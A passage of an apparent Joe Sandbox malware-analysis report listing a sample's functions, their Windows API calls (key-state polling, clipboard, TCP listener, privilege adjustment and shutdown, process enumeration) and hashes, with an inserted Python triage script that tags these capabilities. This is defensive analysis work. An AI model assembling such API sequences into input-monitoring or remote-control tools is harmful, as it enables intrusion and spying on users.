                                                                • Part of subcall function 00AB936C: __swprintf.LIBCMT ref: 00AB93AB
                                                                • Part of subcall function 00AB936C: __itow.LIBCMT ref: 00AB93DF
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B1332D
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B133C5
                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B13604
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00B13611
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1240663315-0
                                                              • Opcode ID: 2211f214fdc4c89de07b3690d1326825dcea8ca3f869d57a0c1511f4d45848db
                                                              • Instruction ID: a40e6f13162b17eb33cb7c11250ed5198218f97d2cf6f3042b692b0d4eda5ce7
                                                              • Opcode Fuzzy Hash: 2211f214fdc4c89de07b3690d1326825dcea8ca3f869d57a0c1511f4d45848db
                                                              • Instruction Fuzzy Hash: 51E16D31604200AFCB15DF28C991E6EBBE9FF88B10F1484ADF54ADB262DB31E945CB51
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00AF2B5F
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00AF2BE0
                                                              • GetKeyState.USER32(000000A0), ref: 00AF2BFB
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00AF2C15
                                                              • GetKeyState.USER32(000000A1), ref: 00AF2C2A
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00AF2C42
                                                              • GetKeyState.USER32(00000011), ref: 00AF2C54
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00AF2C6C
                                                              • GetKeyState.USER32(00000012), ref: 00AF2C7E
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00AF2C96
                                                              • GetKeyState.USER32(0000005B), ref: 00AF2CA8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              • Opcode ID: 6d851147800665ab670451846cbb23c49f59850987f53d09c229661862572220
                                                              • Instruction ID: c499adad0a62d447dfbffa0dbd7ff4ce9ad4bd8f3aa549e0dcb52b23a064ad5a
                                                              • Opcode Fuzzy Hash: 6d851147800665ab670451846cbb23c49f59850987f53d09c229661862572220
                                                              • Instruction Fuzzy Hash: E54184345047CD6DFF359BE499143B9BEA0AB21344F048059FBC6572C2DBA499C9C7A2
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                              • String ID:
                                                              • API String ID: 1737998785-0
                                                              • Opcode ID: 854ab65bf0128bd3db66c0b97d706eb7865d7933466fe4155164ea4583a9bb54
                                                              • Instruction ID: d247da267c030dda37df8b75a116416828755d28ea176876abdce1f8d771ab66
                                                              • Opcode Fuzzy Hash: 854ab65bf0128bd3db66c0b97d706eb7865d7933466fe4155164ea4583a9bb54
                                                              • Instruction Fuzzy Hash: 99217F313002149FDB11AF69ED4AB2E7BE8FF44711F15846AF91ADB2A1DF30E9118B54
                                                              APIs
                                                                • Part of subcall function 00AE9ABF: CLSIDFromProgID.OLE32 ref: 00AE9ADC
                                                                • Part of subcall function 00AE9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00AE9AF7
                                                                • Part of subcall function 00AE9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00AE9B05
                                                                • Part of subcall function 00AE9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00AE9B15
                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B0C235
                                                              • _memset.LIBCMT ref: 00B0C242
                                                              • _memset.LIBCMT ref: 00B0C360
                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00B0C38C
                                                              • CoTaskMemFree.OLE32(?), ref: 00B0C397
                                                              Strings
                                                              • NULL Pointer assignment, xrefs: 00B0C3E5
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                              • String ID: NULL Pointer assignment
                                                              • API String ID: 1300414916-2785691316
                                                              • Opcode ID: 6b7c43dcfd57febfb1ba03cce11aba58be75e9ae6be7e9605fe4b5e6d07e058c
                                                              • Instruction ID: 9f6eb5c6c3a6a74504c936d594951ce8a67e4bf18e071d94737928b4f31f91a8
                                                              • Opcode Fuzzy Hash: 6b7c43dcfd57febfb1ba03cce11aba58be75e9ae6be7e9605fe4b5e6d07e058c
                                                              • Instruction Fuzzy Hash: C4912A71D00218ABDB10DF94DD95EDEBBB9FF04710F20815AF515A7291EB70AA45CFA0
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00B01FE1
                                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00B02011
                                                              • _wcscmp.LIBCMT ref: 00B02025
                                                              • _wcscmp.LIBCMT ref: 00B02040
                                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00B020DE
                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00B020F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNextSleep
                                                              • String ID: *.*
                                                              • API String ID: 3356411064-438819550
                                                              • Opcode ID: 8ea05729971abd210c0c4927b4a0696f2be99fc9ef3e2e5c2ae9688d223f0a48
                                                              • Instruction ID: 4ea056faf4e44506688880e0f1a8566b453d22bae4464b7094dfe9a9a18b1e25
                                                              • Opcode Fuzzy Hash: 8ea05729971abd210c0c4927b4a0696f2be99fc9ef3e2e5c2ae9688d223f0a48
                                                              • Instruction Fuzzy Hash: 7B417B7190021AAFCF14DFA4CD49BEEBBB8FF05314F10459AE815A31D2EB709A88CB50
                                                              APIs
                                                                • Part of subcall function 00AEB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AEB180
                                                                • Part of subcall function 00AEB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AEB1AD
                                                                • Part of subcall function 00AEB134: GetLastError.KERNEL32 ref: 00AEB1BA
                                                              • ExitWindowsEx.USER32(?,00000000), ref: 00AF7A0F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                              • String ID: $@$SeShutdownPrivilege
                                                              • API String ID: 2234035333-194228
                                                              • Opcode ID: 3400913c2dfeabc5927c4c92960de32ffa6f4ac2bdcc649eea84c791ab53f4fc
                                                              • Instruction ID: f3d533a212fe7315458758ef5c33b96183574d1ecd4b66d25ae491e2b49e992e
                                                              • Opcode Fuzzy Hash: 3400913c2dfeabc5927c4c92960de32ffa6f4ac2bdcc649eea84c791ab53f4fc
                                                              • Instruction Fuzzy Hash: EA01A7717582296AF72877F4DC5AFBF72689B047C0F260564FB43A20D2E9A15E0081B0
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B08CA8
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B08CB7
                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00B08CD3
                                                              • listen.WSOCK32(00000000,00000005), ref: 00B08CE2
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00B08CFC
                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00B08D10
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                              • String ID:
                                                              • API String ID: 1279440585-0
                                                              • Opcode ID: 7a68a25d91325744404f1b7bd2b1cdff9aacaca0236ce73f6f2be530ec16aafe
                                                              • Instruction ID: fa2698ef6acf20b925dd931cffe3f36a9279680f1d45bb07f58d68bcae333f7a
                                                              • Opcode Fuzzy Hash: 7a68a25d91325744404f1b7bd2b1cdff9aacaca0236ce73f6f2be530ec16aafe
                                                              • Instruction Fuzzy Hash: 9221A531600204AFDB10AF64DA45B6EBBE9EF44310F148558F956A72D2CF30AD418B51
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AEAFAE
                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00AEAFB5
                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AEAFC4
                                                              • CloseHandle.KERNEL32(00000004), ref: 00AEAFCF
                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AEAFFE
                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AEB012
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                              • String ID:
                                                              • API String ID: 1413079979-0
                                                              • Opcode ID: e1a49f23000f4f3c3a7348a5985b43db920774a2aca268c52ebbc8c9c5373c9e
                                                              • Instruction ID: ff43408068355c6720ef0324cb4392c0f0e937a9cdcc9e09ea6cfce713144053
                                                              • Opcode Fuzzy Hash: e1a49f23000f4f3c3a7348a5985b43db920774a2aca268c52ebbc8c9c5373c9e
                                                              • Instruction Fuzzy Hash: 3A215B72144249AFDF028FA5ED09FAE7BA9EF44704F148055FA02A2161C776ED21EB61
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AF6554
                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AF6564
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00AF6583
                                                              • __wsplitpath.LIBCMT ref: 00AF65A7
                                                              • _wcscat.LIBCMT ref: 00AF65BA
                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AF65F9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                              • String ID:
                                                              • API String ID: 1605983538-0
                                                              • Opcode ID: e03a89c455784b5963e67720e9b4fbfa4cb6eb0c004754df00f3214cba7e7ebf
                                                              • Instruction ID: f848a6f751690b5da617b5c25fb08e3e700dba75a13d7e0da5c55fd84adf9e3e
                                                              • Opcode Fuzzy Hash: e03a89c455784b5963e67720e9b4fbfa4cb6eb0c004754df00f3214cba7e7ebf
                                                              • Instruction Fuzzy Hash: 4E21847190021CABDB10ABA4DD88FEEBBBCAB49300F5004A9F645E7141EB719F85CB60
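The function entries above (modifier-key polling via GetAsyncKeyState/GetKeyState, the socket/bind/listen sequence, LookupPrivilegeValueW/AdjustTokenPrivileges before ExitWindowsEx, and the CreateToolhelp32Snapshot/Process32FirstW/Process32NextW walk) are quicker to triage once the raw hex arguments are decoded and each function is tagged by the capability its API set implies. The Python below is an added example written for this page, not code from Joe Sandbox, from the IDA plugin, or from the sample itself. It parses entries in the report's own line format ("• api.MODULE(args), ref: ADDR", with the optional "Part of subcall function" prefix), decodes the constants it recognises (virtual-key codes, socket family/type/protocol, the listen backlog, Toolhelp32 snapshot flags; all standard Windows SDK values), and maps API sets to capability tags. The embedded sample input is copied from this report's entries and trimmed; the rule table and tag wording are the example's own choices, and a rule only fires when every API in its set is present in one function.

```python
import re

# Constructed sample: four function entries copied from this report's listing
# (key-state polling, TCP listener, SeShutdownPrivilege/ExitWindowsEx,
# Toolhelp32 process enumeration), trimmed to the lines the parser reads.
SAMPLE = """\
APIs
• GetAsyncKeyState.USER32(000000A0), ref: 00AF2BE0
• GetKeyState.USER32(000000A0), ref: 00AF2BFB
• GetAsyncKeyState.USER32(00000011), ref: 00AF2C42
• GetKeyState.USER32(0000005B), ref: 00AF2CA8
Memory Dump Source
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B08CA8
• WSAGetLastError.WSOCK32(00000000), ref: 00B08CB7
• bind.WSOCK32(00000000,?,00000010), ref: 00B08CD3
• listen.WSOCK32(00000000,00000005), ref: 00B08CE2
• closesocket.WSOCK32(00000000,00000000), ref: 00B08D10
Memory Dump Source
APIs
  • Part of subcall function 00AEB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AEB180
  • Part of subcall function 00AEB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AEB1AD
• ExitWindowsEx.USER32(?,00000000), ref: 00AF7A0F
Strings
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AF6554
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AF6564
• Process32NextW.KERNEL32(00000000,0000022C), ref: 00AF6583
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AF65F9
Memory Dump Source
"""

# One API line: "• api.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR:" and optionally without an argument list.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Constant tables for the arguments this report shows (Windows SDK values).
VK = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}
AF = {2: "AF_INET"}
SOCK = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
TH32 = {0x2: "TH32CS_SNAPPROCESS"}

# API sets that together indicate a capability; the tag wording is this example's own.
RULES = [
    ({"GetAsyncKeyState", "GetKeyState"}, "polls modifier-key state (input monitoring)"),
    ({"socket", "bind", "listen"}, "opens a TCP listening socket"),
    ({"LookupPrivilegeValueW", "AdjustTokenPrivileges"}, "adjusts token privileges"),
    ({"ExitWindowsEx"}, "logs off / shuts down / reboots the host"),
    ({"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}, "enumerates running processes"),
    ({"CreateProcessWithLogonW"}, "creates a process under other credentials"),
    ({"LoadLibraryA", "GetProcAddress"}, "resolves APIs at run time"),
    ({"FindFirstFileW", "FindNextFileW"}, "walks a directory"),
]


def parse_arg(tok):
    """8-hex-digit arguments become ints; '?' and string literals stay as strings."""
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok


def parse_entries(text):
    """Split the listing at each 'APIs' header and collect that function's calls."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": []}
            entries.append(cur)
            continue
        m = API_LINE.match(line) if cur is not None else None
        if m:
            args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
            cur["calls"].append({"api": m["api"], "module": m["mod"], "args": args,
                                 "ref": m["ref"], "subcall": m["sub"]})
    return entries


def decode(call):
    """Render the constants this example knows; None when there is nothing to decode."""
    api, a = call["api"], call["args"]
    if api in ("GetAsyncKeyState", "GetKeyState") and a and isinstance(a[0], int):
        return f"{api}({VK.get(a[0], hex(a[0]))})"
    if api == "socket" and len(a) >= 3 and all(isinstance(x, int) for x in a[:3]):
        return f"socket({AF.get(a[0], a[0])}, {SOCK.get(a[1], a[1])}, {PROTO.get(a[2], a[2])})"
    if api == "listen" and len(a) >= 2 and isinstance(a[1], int):
        return f"listen(backlog={a[1]})"
    if api == "CreateToolhelp32Snapshot" and a and isinstance(a[0], int):
        return f"CreateToolhelp32Snapshot({TH32.get(a[0], hex(a[0]))})"
    return None


def tag_entry(entry):
    """Return the capability tags whose required API set is fully present."""
    names = {c["api"] for c in entry["calls"]}
    return [tag for needed, tag in RULES if needed <= names]


def triage(text):
    """Per function: call addresses, decoded calls and capability tags."""
    out = []
    for e in parse_entries(text):
        out.append({"refs": [c["ref"] for c in e["calls"]],
                    "decoded": [d for d in map(decode, e["calls"]) if d],
                    "tags": tag_entry(e)})
    return out


if __name__ == "__main__":
    for fn in triage(SAMPLE):
        print(fn["refs"][0], fn["tags"], fn["decoded"])
```

Feed it the full function listing of a report (or any subset of entries) rather than the embedded sample to get one tagged record per function; a function that matches no rule still comes back, with an empty tag list, so the absence of a tag is visible rather than silently dropped. The rule table is deliberately conservative: WSAGetLastError and CloseHandle carry no weight on their own, and a listener is only reported when socket, bind and listen all appear in the same function.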
                                                              APIs
                                                                • Part of subcall function 00B0A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00B0A84E
                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00B09296
                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00B092B9
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastinet_addrsocket
                                                              • String ID:
                                                              • API String ID: 4170576061-0
                                                              • Opcode ID: d8371675c79cca506b9148a317803f3b5e4c63a01c7998e1eaf647de01ad837c
                                                              • Instruction ID: fa8560dd54b168e9e52adbd2dcf91a43cd44dc3bac3337584b8df0ebbcc9eb59
                                                              • Opcode Fuzzy Hash: d8371675c79cca506b9148a317803f3b5e4c63a01c7998e1eaf647de01ad837c
                                                              • Instruction Fuzzy Hash: 6641C070600204AFDB10AB68CA82F7EB7EDEF44724F15844CF956AB3D3DA749D018B91
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00AFEB8A
                                                              • _wcscmp.LIBCMT ref: 00AFEBBA
                                                              • _wcscmp.LIBCMT ref: 00AFEBCF
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00AFEBE0
                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00AFEC0E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                              • String ID:
                                                              • API String ID: 2387731787-0
                                                              • Opcode ID: 876fd47ff3f27d5f452a23e9d9dff4c802896c23d191da5ae9a21c8a0d3bec3e
                                                              • Instruction ID: 6f6601d637fe3f42edb4e15f102f852616bbe7609ab1feccccfdf748c8b93edf
                                                              • Opcode Fuzzy Hash: 876fd47ff3f27d5f452a23e9d9dff4c802896c23d191da5ae9a21c8a0d3bec3e
                                                              • Instruction Fuzzy Hash: 7B41AA356047069FCB18DF68C491EAAB3E4FF49324F10456EFA5A8B3A1DB31A941CB91
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                              • String ID:
                                                              • API String ID: 292994002-0
                                                              • Opcode ID: 627cc84b5d8bdccb1e2e016dce2ad9017dd33c14834966ea0bb3059820cd09f7
                                                              • Instruction ID: 09ed4c050a294abf2d9636ce94b75c1a9944cecb494d89be94487a3a315acece
                                                              • Opcode Fuzzy Hash: 627cc84b5d8bdccb1e2e016dce2ad9017dd33c14834966ea0bb3059820cd09f7
                                                              • Instruction Fuzzy Hash: 461190323002106BE7211F26EC45FAEBBDCFF59760B554469F849E7251CF30995286A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                              • API String ID: 0-1546025612
                                                              • Opcode ID: 86de983dc4324a474d096157c34e84041ed7b78eb4d9ff5d0baa1254674aab90
                                                              • Instruction ID: 991ecdc598bf4755043a29dfc8c6e70ac2a012b187368ef060bb36a63d46eb85
